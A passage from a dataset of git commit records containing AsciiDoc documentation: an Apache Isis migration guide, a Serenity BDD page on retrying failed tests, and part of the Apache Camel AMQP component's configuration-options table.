(future work)\n\n| `MetamodelEvent` as provided with _metamodel_ moved\n| moved to _applib_; we introduced _interface_ `MetamodelListener` for convenience to maybe use instead\n[source, java]\n.Example\n----\n@Service\npublic class SeedService implements MetamodelListener {\n\/..\n @Override\n public void onMetamodelLoaded() {\n \/\/ seed database entities\n }\n}\n---- \n\n| Factory method `Identifier.propertyOrCollectionIdentifier(..)`\n| was slit up into `Identifier.propertyIdentifier(..)` and `Identifier.collectionIdentifier(..)`\n\n|===\n\n== Commons\n\nThe following changed:\n[cols=\"2a,3a\", options=\"header\"]\n\n|===\n\n| previously\n| new\n\n| `Result<T>` removed\n| replaced by `Try<T>`; also promoting `Either<L, R>` to non-internal, \nand introducing `Railway<F, S>` \n\n|===\n\n== Configuration\n\nThe following changed:\n[cols=\"2a,3a\", options=\"header\"]\n\n|===\n\n| previously\n| new\n\n| (non-essential) object meta-data mixins were split out of `IsisModuleApplib` \n| need to be explicitly imported via `IsisModuleApplibObjectMetadataMixins`\n\n| default logging subscribers were split out of `IsisModuleApplib` \n| need to be explicitly imported via `IsisModuleApplibChangeAndExecutionLoggers`\n\n|===\n\n== Other\n\n=== Bill of Material \/ Parent POM\n\nFolder moved `\/isis-parent` -> `\/bom` \n\n[source, xml]\n.Bill of Material\n----\n<!-- renamed\n<groupId>org.apache.isis<\/groupId>\n<artifactId>isis-parent<\/artifactId>\n-->\n\n<groupId>org.apache.isis<\/groupId>\n<artifactId>isis-bom<\/artifactId>\n----\n\n=== Restclient\n\n[source, java]\n.Restclient Package Names\n----\n\/\/ renamed ...\n\/\/import org.apache.isis.extensions.restclient.RestfulClient;\n\/\/import org.apache.isis.extensions.restclient.RestfulClientConfig;\nimport org.apache.isis.viewer.restfulobjects.client.RestfulClient;\nimport org.apache.isis.viewer.restfulobjects.client.RestfulClientConfig;\n----\n\n[source, xml]\n.Restclient Artifacts\n----\n<!-- renamed\n<groupId>org.apache.isis.mappings<\/groupId>\n<artifactId>isis-mappings-restclient-applib<\/artifactId>\n-->\n\n<groupId>org.apache.isis.viewer<\/groupId>\n<artifactId>isis-viewer-restfulobjects-client<\/artifactId>\n----\n\n[source, java]\n.Restclient Usage\n----\n\/\/ DigestResponse is no longer publicly visible, instead returning Try<T> \n<T> Try<T> digest(Response response, Class<T> entityType);\n\n\/\/ DigestResponse is no longer publicly visible, instead returning Try<Can<T>>\n<T> Try<Can<T>> digestList(Response response, Class<T> entityType, GenericType<List<T>> genericType);\n----\n\n=== Mappings\n\n[source, xml]\n.Mappings\n----\n<!-- all removed\n<groupId>org.apache.isis.mappings<\/groupId>\n<artifactId>isis-mappings-...<\/artifactId>\n-->\n----\n\n=== Mavendeps\n\n[source, xml]\n.integtests\n----\n<!-- removed\n<groupId>org.apache.isis.mavendeps<\/groupId>\n<artifactId>isis-mavendeps-integtests<\/artifactId>\n<type>pom<\/type>\n-->\n\n<!-- instead use directly as required ... -->\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-integtestsupport-applib<\/artifactId>\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-fakedata-applib<\/artifactId>\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-fixtures-applib<\/artifactId>\n----\n\n[source, xml]\n.unittests\n----\n<!-- removed\n<groupId>org.apache.isis.mavendeps<\/groupId>\n<artifactId>isis-mavendeps-unittests<\/artifactId>\n<type>pom<\/type>\n-->\n\n<!-- instead use directly as required ... -->\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-unittestsupport-applib<\/artifactId>\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-fakedata-applib<\/artifactId>\n----\n\n\n","old_contents":"= Migrating from M7 to M8\n\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n:page-partial:\n\n(This page will be added to as development progresses).\n\n== Programming Model\n\n[cols=\"2a,3a\", options=\"header\"]\n\n|===\n\n| previously\n| new\n\n| `@DomainService.logicalTypeName` deprecated for removal\n| use `@Named` or any other semantics supported by Spring\n+\nBehavioral change: `@DomainService.logicalTypeName` can now be left empty, which is interpreted as _unspecified\/indifferent_ \n\n| `RecreatableDomainObject` interface removed\n| use `ViewModel` interface instead\n\n| `ViewModel.viewModelInit(String memento)` removed\n| use a single (String) argument constructor instead; this will allow Java Records to be used as viewmodels (future work)\n\n| `MetamodelEvent` as provided with _metamodel_ moved\n| moved to _applib_; we introduced _interface_ `MetamodelListener` for convenience to maybe use instead\n[source, java]\n.Example\n----\n@Service\npublic class SeedService implements MetamodelListener {\n\/..\n @Override\n public void onMetamodelLoaded() {\n \/\/ seed database entities\n }\n}\n---- \n\n| Factory method `Identifier.propertyOrCollectionIdentifier(..)`\n| was slit up into `Identifier.propertyIdentifier(..)` and `Identifier.collectionIdentifier(..)`\n\n|===\n\n== Commons\n\nThe following changed:\n[cols=\"2a,3a\", options=\"header\"]\n\n|===\n\n| previously\n| new\n\n| `Result<T>` removed\n| replaced by `Try<T>`; also promoting `Either<L, R>` to non-internal, \nand introducing `Railway<F, S>` \n\n|===\n\n== Configuration\n\nThe following changed:\n[cols=\"2a,3a\", options=\"header\"]\n\n|===\n\n| previously\n| new\n\n| (non-essential) object meta-data mixins were split out of `IsisModuleApplib` \n| need to be explicitly imported via `IsisModuleApplibObjectMetadataMixins`\n\n| default logging subscribers were split out of `IsisModuleApplib` \n| need to be explicitly imported via `IsisModuleApplibChangeAndExecutionLoggers`\n\n|===\n\n== Other\n\n=== Bill of Material \/ Parent POM\n\nFolder moved `\/isis-parent` -> `\/bom` \n\n[source, xml]\n.Bill of Material\n----\n<!-- renamed\n<groupId>org.apache.isis<\/groupId>\n<artifactId>isis-parent<\/artifactId>\n-->\n\n<groupId>org.apache.isis<\/groupId>\n<artifactId>isis-bom<\/artifactId>\n----\n\n=== Restclient\n\n[source, java]\n.Restclient Package Names\n----\n\/\/ renamed ...\n\/\/import org.apache.isis.extensions.restclient.RestfulClient;\n\/\/import org.apache.isis.extensions.restclient.RestfulClientConfig;\nimport org.apache.isis.viewer.restfulobjects.client.RestfulClient;\nimport org.apache.isis.viewer.restfulobjects.client.RestfulClientConfig;\n----\n\n[source, xml]\n.Restclient Artifacts\n----\n<!-- renamed\n<groupId>org.apache.isis.mappings<\/groupId>\n<artifactId>isis-mappings-restclient-applib<\/artifactId>\n-->\n\n<groupId>org.apache.isis.viewer<\/groupId>\n<artifactId>isis-viewer-restfulobjects-client<\/artifactId>\n----\n\n[source, java]\n.Restclient Usage\n----\n\/\/ DigestResponse is no longer publicly visible, instead returning Try<T> \n<T> Try<T> digest(Response response, Class<T> entityType);\n\n\/\/ DigestResponse is no longer publicly visible, instead returning Try<Can<T>>\n<T> Try<Can<T>> digestList(Response response, Class<T> entityType, GenericType<List<T>> genericType);\n----\n\n=== Mappings\n\n[source, xml]\n.Mappings\n----\n<!-- all removed\n<groupId>org.apache.isis.mappings<\/groupId>\n<artifactId>isis-mappings-...<\/artifactId>\n-->\n----\n\n=== Mavendeps\n\n[source, xml]\n.integtests\n----\n<!-- removed\n<groupId>org.apache.isis.mavendeps<\/groupId>\n<artifactId>isis-mavendeps-integtests<\/artifactId>\n<type>pom<\/type>\n-->\n\n<!-- instead use directly as required ... -->\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-integtestsupport-applib<\/artifactId>\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-fakedata-applib<\/artifactId>\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-fixtures-applib<\/artifactId>\n----\n\n[source, xml]\n.unittests\n----\n<!-- removed\n<groupId>org.apache.isis.mavendeps<\/groupId>\n<artifactId>isis-mavendeps-unittests<\/artifactId>\n<type>pom<\/type>\n-->\n\n<!-- instead use directly as required ... -->\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-unittestsupport-applib<\/artifactId>\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-fakedata-applib<\/artifactId>\n----\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"19522665e48c1f2f0ffc30c9dbef830979a2136e","subject":"actualize Retrying failed tests docu","message":"actualize Retrying failed tests docu\n","repos":"serenity-bdd\/serenity-documentation,serenity-bdd\/serenity-documentation","old_file":"src\/asciidoc\/retry.adoc","new_file":"src\/asciidoc\/retry.adoc","new_contents":"Sometimes it is required to retry a failed test. For the Junit tests, this can be achieved by setting the system property +test.retry.count+ to the maximum number of times you want the failed tests to be retried. All method tests will be executed until first successful run, but not more than +test.retry.count+ times.\n\nFor the Cucumber tests, there is an equivalent property +test.retry.count.cucumber+\n\nHere is short example, for it we will use next test class:\n\n[source,java]\n----\ninclude::{srcdir}\/junit-retries\/net\/serenity\/samples\/retries\/SampleTest.java[]\n----\n\nSteps class:\n\n[source,java]\n----\ninclude::{srcdir}\/junit-retries\/net\/serenity\/samples\/retries\/TestSteps.java[]\n----\n\nIf this test will be executed - it will fail:\n\n\n[[retry_test_fail]]\n.Report with failed scenario\nimage::retry_test_fail.png[]\n\nIf we set the property +test.retry.count=4+ in serenity.property file, the failing tests will be executed until they will be successful or the maximum number of tries will be reached:\n\nThe same test execution with the +test.retry.count+ property set will be successfull - because the method +then_example_result_should_be+ fails only twice, and third execution will be successful:\n\n[[retry_test_fail]]\n.Report with successful unstable scenario\nimage::retry_test_success_unstable.png[]\n\nIf you're using Jenkins for aggregating your test results use this folder pattern for JUnit test results:\n\n----\ntarget\/site\/serenity\/SERENITY-JUNIT-*.xml\n----\n\nThis will exclude the previous failed tests from your report.\n","old_contents":"Sometimes it is required to retry a failed test. This can be achieved by setting the system properties +junit.retry.tests+ to true and +max.retries+ to the number of times you want failed tests to be retried. If +max.retries+ provided and +junit.retry.tests+=true, all method tests will be executed until first successful run, but not more than 1 + +max.retries+ times.\n\nHere is short example, for it we will use next test class:\n\n[source,java]\n----\ninclude::{srcdir}\/junit-retries\/net\/serenity\/samples\/retries\/SampleTest.java[]\n----\n\nSteps class:\n\n[source,java]\n----\ninclude::{srcdir}\/junit-retries\/net\/serenity\/samples\/retries\/TestSteps.java[]\n----\n\nIf this test will be executed - it will fail:\n\n\n[[retry_test_fail]]\n.Report with failed scenario\nimage::retry_test_fail.png[]\n\nIf we provide next properties in serenity.property file, framework will execute tests more according to configuration until test will be successful or number of tries will be reached:\n\n----\nmax.retries=4\njunit.retry.tests=true\n----\n\nAfter executing same test it will be successful - because method +then_example_result_should_be+ fails only twice, and third \"try\" will successful:\n\n\n[[retry_test_fail]]\n.Report with successful scenario\nimage::retry_test_success.png[]\n\nIf you're using Jenkins for aggregating your test results use this folder pattern for JUnit test results:\n\n----\ntarget\/site\/serenity\/SERENITY-JUNIT-*.xml\n----\n\nThis will exclude the previous failed tests from your report.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"15b58bcfd24d4a4cadb5eaa57086dc60395ef10b","subject":"Fix Typo AMQP protocol","message":"Fix Typo AMQP protocol\n","repos":"pmoerenhout\/camel,jamesnetherton\/camel,onders86\/camel,gnodet\/camel,dmvolod\/camel,dmvolod\/camel,tdiesler\/camel,anoordover\/camel,zregvart\/camel,curso007\/camel,nikhilvibhav\/camel,rmarting\/camel,pax95\/camel,nicolaferraro\/camel,jonmcewen\/camel,rmarting\/camel,pax95\/camel,akhettar\/camel,anoordover\/camel,jonmcewen\/camel,ullgren\/camel,zregvart\/camel,gnodet\/camel,onders86\/camel,gautric\/camel,onders86\/camel,tadayosi\/camel,snurmine\/camel,jonmcewen\/camel,pmoerenhout\/camel,nicolaferraro\/camel,onders86\/camel,snurmine\/camel,CodeSmell\/camel,curso007\/camel,apache\/camel,kevinearls\/camel,akhettar\/camel,tdiesler\/camel,dmvolod\/camel,DariusX\/camel,pmoerenhout\/camel,cunningt\/camel,alvinkwekel\/camel,pax95\/camel,adessaigne\/camel,alvinkwekel\/camel,gnodet\/camel,ullgren\/camel,jonmcewen\/camel,adessaigne\/camel,snurmine\/camel,objectiser\/camel,zregvart\/camel,ullgren\/camel,CodeSmell\/camel,davidkarlsen\/camel,tadayosi\/camel,gnodet\/camel,onders86\/camel,cunningt\/camel,tadayosi\/camel,akhettar\/camel,rmarting\/camel,tdiesler\/camel,CodeSmell\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,cunningt\/camel,sverkera\/camel,gautric\/camel,Fabryprog\/camel,Fabryprog\/camel,apache\/camel,kevinearls\/camel,zregvart\/camel,adessaigne\/camel,dmvolod\/camel,cunningt\/camel,christophd\/camel,kevinearls\/camel,rmarting\/camel,nikhilvibhav\/camel,DariusX\/camel,christophd\/camel,christophd\/camel,Fabryprog\/camel,mcollovati\/camel,davidkarlsen\/camel,christophd\/camel,alvinkwekel\/camel,snurmine\/camel,kevinearls\/camel,curso007\/camel,alvinkwekel\/camel,sverkera\/camel,adessaigne\/camel,mcollovati\/camel,tadayosi\/camel,pmoerenhout\/camel,cunningt\/camel,anoordover\/camel,tdiesler\/camel,sverkera\/camel,apache\/camel,jonmcewen\/camel,tdiesler\/camel,apache\/camel,gautric\/camel,pax95\/camel,pax95\/camel,akhettar\/camel,apache\/camel,anoordover\/camel,tadayosi\/camel,objectiser\/camel,jamesnetherton\/camel,DariusX\/camel,tadayosi\/camel,snurmine\/camel,adessaigne\/camel,rmarting\/camel,DariusX\/camel,gautric\/camel,gnodet\/camel,adessaigne\/camel,sverkera\/camel,akhettar\/camel,rmarting\/camel,jamesnetherton\/camel,kevinearls\/camel,sverkera\/camel,curso007\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,dmvolod\/camel,apache\/camel,mcollovati\/camel,punkhorn\/camel-upstream,Fabryprog\/camel,nicolaferraro\/camel,sverkera\/camel,kevinearls\/camel,christophd\/camel,tdiesler\/camel,christophd\/camel,objectiser\/camel,ullgren\/camel,snurmine\/camel,CodeSmell\/camel,pmoerenhout\/camel,anoordover\/camel,gautric\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,gautric\/camel,jamesnetherton\/camel,akhettar\/camel,cunningt\/camel,davidkarlsen\/camel,objectiser\/camel,pax95\/camel,curso007\/camel,nicolaferraro\/camel,jonmcewen\/camel,jamesnetherton\/camel,mcollovati\/camel,punkhorn\/camel-upstream,onders86\/camel,anoordover\/camel,curso007\/camel,davidkarlsen\/camel,dmvolod\/camel","old_file":"components\/camel-amqp\/src\/main\/docs\/amqp-component.adoc","new_file":"components\/camel-amqp\/src\/main\/docs\/amqp-component.adoc","new_contents":"[[amqp-component]]\n== AMQP Component\n\n*Available as of Camel version 1.2*\n\nThe *amqp:* component supports the http:\/\/www.amqp.org\/[AMQP 1.0\nprotocol] using the JMS Client API of the http:\/\/qpid.apache.org\/[Qpid]\nproject. In case you want to use AMQP 0.9 (in particular RabbitMQ) you\nmight also be interested in the <<rabbitmq-component,Camel RabbitMQ>>\ncomponent. Please keep in mind that prior to the Camel 2.17.0 AMQP\ncomponent supported AMQP 0.9 and above, however since Camel 2.17.0 it\nsupports only AMQP 1.0.\n\nMaven users will need to add the following dependency to their `pom.xml`\nfor this component:\n\n[source,xml]\n------------------------------------------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-amqp<\/artifactId>\n <version>${camel.version}<\/version> <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------------------------------------------\n\n### URI format\n\n[source,java]\n---------------------------------------------\namqp:[queue:|topic:]destinationName[?options]\n---------------------------------------------\n\n### AMQP Options\n\nYou can specify all of the various configuration options of the\nlink:..\/..\/..\/..\/camel-jms\/src\/main\/docs\/readme.html[JMS] component after the destination name.\n\n\n\n\n\/\/ component options: START\nThe AMQP component supports 79 options which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (advanced) | To use a shared JMS configuration | | JmsConfiguration\n| *acceptMessagesWhile Stopping* (consumer) | Specifies whether the consumer accept messages while it is stopping. You may consider enabling this option, if you start and stop JMS routes at runtime, while there are still messages enqueued on the queue. If this option is false, and you stop the JMS route, then messages may be rejected, and the JMS broker would have to attempt redeliveries, which yet again may be rejected, and eventually the message may be moved at a dead letter queue on the JMS broker. To avoid this its recommended to enable this option. | false | boolean\n| *allowReplyManagerQuick Stop* (consumer) | Whether the DefaultMessageListenerContainer used in the reply managers for request-reply messaging allow the DefaultMessageListenerContainer.runningAllowed flag to quick stop in case JmsConfigurationisAcceptMessagesWhileStopping is enabled, and org.apache.camel.CamelContext is currently being stopped. This quick stop ability is enabled by default in the regular JMS consumers but to enable for reply managers you must enable this flag. | false | boolean\n| *acknowledgementMode* (consumer) | The JMS acknowledgement mode defined as an Integer. Allows you to set vendor-specific extensions to the acknowledgment mode.For the regular modes, it is preferable to use the acknowledgementModeName instead. | | int\n| *eagerLoadingOf Properties* (consumer) | Enables eager loading of JMS properties as soon as a message is loaded which generally is inefficient as the JMS properties may not be required but sometimes can catch early any issues with the underlying JMS provider and the use of JMS properties | false | boolean\n| *acknowledgementModeName* (consumer) | The JMS acknowledgement name, which is one of: SESSION_TRANSACTED, CLIENT_ACKNOWLEDGE, AUTO_ACKNOWLEDGE, DUPS_OK_ACKNOWLEDGE | AUTO_ ACKNOWLEDGE | String\n| *autoStartup* (consumer) | Specifies whether the consumer container should auto-startup. | true | boolean\n| *cacheLevel* (consumer) | Sets the cache level by ID for the underlying JMS resources. See cacheLevelName option for more details. | | int\n| *cacheLevelName* (consumer) | Sets the cache level by name for the underlying JMS resources. Possible values are: CACHE_AUTO, CACHE_CONNECTION, CACHE_CONSUMER, CACHE_NONE, and CACHE_SESSION. The default setting is CACHE_AUTO. See the Spring documentation and Transactions Cache Levels for more information. | CACHE_AUTO | String\n| *replyToCacheLevelName* (producer) | Sets the cache level by name for the reply consumer when doing request\/reply over JMS. This option only applies when using fixed reply queues (not temporary). Camel will by default use: CACHE_CONSUMER for exclusive or shared w\/ replyToSelectorName. And CACHE_SESSION for shared without replyToSelectorName. Some JMS brokers such as IBM WebSphere may require to set the replyToCacheLevelName=CACHE_NONE to work. Note: If using temporary queues then CACHE_NONE is not allowed, and you must use a higher value such as CACHE_CONSUMER or CACHE_SESSION. | | String\n| *clientId* (common) | Sets the JMS client ID to use. Note that this value, if specified, must be unique and can only be used by a single JMS connection instance. It is typically only required for durable topic subscriptions. If using Apache ActiveMQ you may prefer to use Virtual Topics instead. | | String\n| *concurrentConsumers* (consumer) | Specifies the default number of concurrent consumers when consuming from JMS (not for request\/reply over JMS). See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. When doing request\/reply over JMS then the option replyToConcurrentConsumers is used to control number of concurrent consumers on the reply message listener. | 1 | int\n| *replyToConcurrent Consumers* (producer) | Specifies the default number of concurrent consumers when doing request\/reply over JMS. See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. | 1 | int\n| *connectionFactory* (common) | The connection factory to be use. A connection factory must be configured either on the component or endpoint. | | ConnectionFactory\n| *username* (security) | Username to use with the ConnectionFactory. You can also configure username\/password directly on the ConnectionFactory. | | String\n| *password* (security) | Password to use with the ConnectionFactory. You can also configure username\/password directly on the ConnectionFactory. | | String\n| *deliveryPersistent* (producer) | Specifies whether persistent delivery is used by default. | true | boolean\n| *deliveryMode* (producer) | Specifies the delivery mode to be used. Possibles values are those defined by javax.jms.DeliveryMode. NON_PERSISTENT = 1 and PERSISTENT = 2. | | Integer\n| *durableSubscriptionName* (common) | The durable subscriber name for specifying durable topic subscriptions. The clientId option must be configured as well. | | String\n| *exceptionListener* (advanced) | Specifies the JMS Exception Listener that is to be notified of any underlying JMS exceptions. | | ExceptionListener\n| *errorHandler* (advanced) | Specifies a org.springframework.util.ErrorHandler to be invoked in case of any uncaught exceptions thrown while processing a Message. By default these exceptions will be logged at the WARN level, if no errorHandler has been configured. You can configure logging level and whether stack traces should be logged using errorHandlerLoggingLevel and errorHandlerLogStackTrace options. This makes it much easier to configure, than having to code a custom errorHandler. | | ErrorHandler\n| *errorHandlerLogging Level* (logging) | Allows to configure the default errorHandler logging level for logging uncaught exceptions. | WARN | LoggingLevel\n| *errorHandlerLogStack Trace* (logging) | Allows to control whether stacktraces should be logged or not, by the default errorHandler. | true | boolean\n| *explicitQosEnabled* (producer) | Set if the deliveryMode, priority or timeToLive qualities of service should be used when sending messages. This option is based on Spring's JmsTemplate. The deliveryMode, priority and timeToLive options are applied to the current endpoint. This contrasts with the preserveMessageQos option, which operates at message granularity, reading QoS properties exclusively from the Camel In message headers. | false | boolean\n| *exposeListenerSession* (consumer) | Specifies whether the listener session should be exposed when consuming messages. | false | boolean\n| *idleTaskExecutionLimit* (advanced) | Specifies the limit for idle executions of a receive task, not having received any message within its execution. If this limit is reached, the task will shut down and leave receiving to other executing tasks (in the case of dynamic scheduling; see the maxConcurrentConsumers setting). There is additional doc available from Spring. | 1 | int\n| *idleConsumerLimit* (advanced) | Specify the limit for the number of consumers that are allowed to be idle at any given time. | 1 | int\n| *maxConcurrentConsumers* (consumer) | Specifies the maximum number of concurrent consumers when consuming from JMS (not for request\/reply over JMS). See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. When doing request\/reply over JMS then the option replyToMaxConcurrentConsumers is used to control number of concurrent consumers on the reply message listener. | | int\n| *replyToMaxConcurrent Consumers* (producer) | Specifies the maximum number of concurrent consumers when using request\/reply over JMS. See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. | | int\n| *replyOnTimeoutToMax ConcurrentConsumers* (producer) | Specifies the maximum number of concurrent consumers for continue routing when timeout occurred when using request\/reply over JMS. | 1 | int\n| *maxMessagesPerTask* (advanced) | The number of messages per task. -1 is unlimited. If you use a range for concurrent consumers (eg min max), then this option can be used to set a value to eg 100 to control how fast the consumers will shrink when less work is required. | -1 | int\n| *messageConverter* (advanced) | To use a custom Spring org.springframework.jms.support.converter.MessageConverter so you can be in control how to map to\/from a javax.jms.Message. | | MessageConverter\n| *mapJmsMessage* (advanced) | Specifies whether Camel should auto map the received JMS message to a suited payload type, such as javax.jms.TextMessage to a String etc. | true | boolean\n| *messageIdEnabled* (advanced) | When sending, specifies whether message IDs should be added. This is just an hint to the JMS broker.If the JMS provider accepts this hint, these messages must have the message ID set to null; if the provider ignores the hint, the message ID must be set to its normal unique value | true | boolean\n| *messageTimestampEnabled* (advanced) | Specifies whether timestamps should be enabled by default on sending messages. This is just an hint to the JMS broker.If the JMS provider accepts this hint, these messages must have the timestamp set to zero; if the provider ignores the hint the timestamp must be set to its normal value | true | boolean\n| *alwaysCopyMessage* (producer) | If true, Camel will always make a JMS message copy of the message when it is passed to the producer for sending. Copying the message is needed in some situations, such as when a replyToDestinationSelectorName is set (incidentally, Camel will set the alwaysCopyMessage option to true, if a replyToDestinationSelectorName is set) | false | boolean\n| *useMessageIDAs CorrelationID* (advanced) | Specifies whether JMSMessageID should always be used as JMSCorrelationID for InOut messages. | false | boolean\n| *priority* (producer) | Values greater than 1 specify the message priority when sending (where 0 is the lowest priority and 9 is the highest). The explicitQosEnabled option must also be enabled in order for this option to have any effect. | 4 | int\n| *pubSubNoLocal* (advanced) | Specifies whether to inhibit the delivery of messages published by its own connection. | false | boolean\n| *receiveTimeout* (advanced) | The timeout for receiving messages (in milliseconds). | 1000 | long\n| *recoveryInterval* (advanced) | Specifies the interval between recovery attempts, i.e. when a connection is being refreshed, in milliseconds. The default is 5000 ms, that is, 5 seconds. | 5000 | long\n| *taskExecutor* (consumer) | Allows you to specify a custom task executor for consuming messages. | | TaskExecutor\n| *timeToLive* (producer) | When sending messages, specifies the time-to-live of the message (in milliseconds). | -1 | long\n| *transacted* (transaction) | Specifies whether to use transacted mode | false | boolean\n| *lazyCreateTransaction Manager* (transaction) | If true, Camel will create a JmsTransactionManager, if there is no transactionManager injected when option transacted=true. | true | boolean\n| *transactionManager* (transaction) | The Spring transaction manager to use. | | PlatformTransaction Manager\n| *transactionName* (transaction) | The name of the transaction to use. | | String\n| *transactionTimeout* (transaction) | The timeout value of the transaction (in seconds), if using transacted mode. | -1 | int\n| *testConnectionOn Startup* (common) | Specifies whether to test the connection on startup. This ensures that when Camel starts that all the JMS consumers have a valid connection to the JMS broker. If a connection cannot be granted then Camel throws an exception on startup. This ensures that Camel is not started with failed connections. The JMS producers is tested as well. | false | boolean\n| *asyncStartListener* (advanced) | Whether to startup the JmsConsumer message listener asynchronously, when starting a route. For example if a JmsConsumer cannot get a connection to a remote JMS broker, then it may block while retrying and\/or failover. This will cause Camel to block while starting routes. By setting this option to true, you will let routes startup, while the JmsConsumer connects to the JMS broker using a dedicated thread in asynchronous mode. If this option is used, then beware that if the connection could not be established, then an exception is logged at WARN level, and the consumer will not be able to receive messages; You can then restart the route to retry. | false | boolean\n| *asyncStopListener* (advanced) | Whether to stop the JmsConsumer message listener asynchronously, when stopping a route. | false | boolean\n| *forceSendOriginal Message* (producer) | When using mapJmsMessage=false Camel will create a new JMS message to send to a new JMS destination if you touch the headers (get or set) during the route. Set this option to true to force Camel to send the original JMS message that was received. | false | boolean\n| *requestTimeout* (producer) | The timeout for waiting for a reply when using the InOut Exchange Pattern (in milliseconds). The default is 20 seconds. You can include the header CamelJmsRequestTimeout to override this endpoint configured timeout value, and thus have per message individual timeout values. See also the requestTimeoutCheckerInterval option. | 20000 | long\n| *requestTimeoutChecker Interval* (advanced) | Configures how often Camel should check for timed out Exchanges when doing request\/reply over JMS. By default Camel checks once per second. But if you must react faster when a timeout occurs, then you can lower this interval, to check more frequently. The timeout is determined by the option requestTimeout. | 1000 | long\n| *transferExchange* (advanced) | You can transfer the exchange over the wire instead of just the body and headers. The following fields are transferred: In body, Out body, Fault body, In headers, Out headers, Fault headers, exchange properties, exchange exception. This requires that the objects are serializable. Camel will exclude any non-serializable objects and log it at WARN level. You must enable this option on both the producer and consumer side, so Camel knows the payloads is an Exchange and not a regular payload. | false | boolean\n| *transferException* (advanced) | If enabled and you are using Request Reply messaging (InOut) and an Exchange failed on the consumer side, then the caused Exception will be send back in response as a javax.jms.ObjectMessage. If the client is Camel, the returned Exception is rethrown. This allows you to use Camel JMS as a bridge in your routing - for example, using persistent queues to enable robust routing. Notice that if you also have transferExchange enabled, this option takes precedence. The caught exception is required to be serializable. The original Exception on the consumer side can be wrapped in an outer exception such as org.apache.camel.RuntimeCamelException when returned to the producer. | false | boolean\n| *transferFault* (advanced) | If enabled and you are using Request Reply messaging (InOut) and an Exchange failed with a SOAP fault (not exception) on the consumer side, then the fault flag on MessageisFault() will be send back in the response as a JMS header with the key org.apache.camel.component.jms.JmsConstantsJMS_TRANSFER_FAULTJMS_TRANSFER_FAULT. If the client is Camel, the returned fault flag will be set on the link org.apache.camel.MessagesetFault(boolean). You may want to enable this when using Camel components that support faults such as SOAP based such as cxf or spring-ws. | false | boolean\n| *jmsOperations* (advanced) | Allows you to use your own implementation of the org.springframework.jms.core.JmsOperations interface. Camel uses JmsTemplate as default. Can be used for testing purpose, but not used much as stated in the spring API docs. | | JmsOperations\n| *destinationResolver* (advanced) | A pluggable org.springframework.jms.support.destination.DestinationResolver that allows you to use your own resolver (for example, to lookup the real destination in a JNDI registry). | | DestinationResolver\n| *replyToType* (producer) | Allows for explicitly specifying which kind of strategy to use for replyTo queues when doing request\/reply over JMS. Possible values are: Temporary, Shared, or Exclusive. By default Camel will use temporary queues. However if replyTo has been configured, then Shared is used by default. This option allows you to use exclusive queues instead of shared ones. See Camel JMS documentation for more details, and especially the notes about the implications if running in a clustered environment, and the fact that Shared reply queues has lower performance than its alternatives Temporary and Exclusive. | | ReplyToType\n| *preserveMessageQos* (producer) | Set to true, if you want to send message using the QoS settings specified on the message, instead of the QoS settings on the JMS endpoint. The following three headers are considered JMSPriority, JMSDeliveryMode, and JMSExpiration. You can provide all or only some of them. If not provided, Camel will fall back to use the values from the endpoint instead. So, when using this option, the headers override the values from the endpoint. The explicitQosEnabled option, by contrast, will only use options set on the endpoint, and not values from the message header. | false | boolean\n| *asyncConsumer* (consumer) | Whether the JmsConsumer processes the Exchange asynchronously. If enabled then the JmsConsumer may pickup the next message from the JMS queue, while the previous message is being processed asynchronously (by the Asynchronous Routing Engine). This means that messages may be processed not 100% strictly in order. If disabled (as default) then the Exchange is fully processed before the JmsConsumer will pickup the next message from the JMS queue. Note if transacted has been enabled, then asyncConsumer=true does not run asynchronously, as transaction must be executed synchronously (Camel 3.0 may support async transactions). | false | boolean\n| *allowNullBody* (producer) | Whether to allow sending messages with no body. If this option is false and the message body is null, then an JMSException is thrown. | true | boolean\n| *includeSentJMS MessageID* (producer) | Only applicable when sending to JMS destination using InOnly (eg fire and forget). Enabling this option will enrich the Camel Exchange with the actual JMSMessageID that was used by the JMS client when the message was sent to the JMS destination. | false | boolean\n| *includeAllJMSX Properties* (advanced) | Whether to include all JMSXxxx properties when mapping from JMS to Camel Message. Setting this to true will include properties such as JMSXAppID, and JMSXUserID etc. Note: If you are using a custom headerFilterStrategy then this option does not apply. | false | boolean\n| *defaultTaskExecutor Type* (consumer) | Specifies what default TaskExecutor type to use in the DefaultMessageListenerContainer, for both consumer endpoints and the ReplyTo consumer of producer endpoints. Possible values: SimpleAsync (uses Spring's 